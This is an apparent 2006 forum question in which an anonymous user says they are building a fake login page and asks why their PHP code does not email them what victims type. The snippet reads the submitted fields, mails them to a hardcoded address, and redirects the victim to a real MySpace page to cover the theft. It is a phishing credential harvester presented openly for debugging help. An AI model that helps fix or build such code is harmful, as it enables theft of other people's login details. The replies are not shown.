i have been trying to make a fake login and everything is good except that is does not email me wut they type in. so here is the code i wrote and tell me wut is wrong
$email = $_REQUEST['email'] ;
$message = $_REQUEST['message'] ;
mail( "hiyohi55", "Feedback Form Results",
$message, "From: $email" );
header( "Location: http://viewmorepics.myspace.com/index.cfm?fuseaction=user.viewPicture&friendID=18595918" );
?>
2006-12-18
15:40:29
·
3 answers
·
asked by
Anonymous
in
Computers & Internet
➔ Programming & Design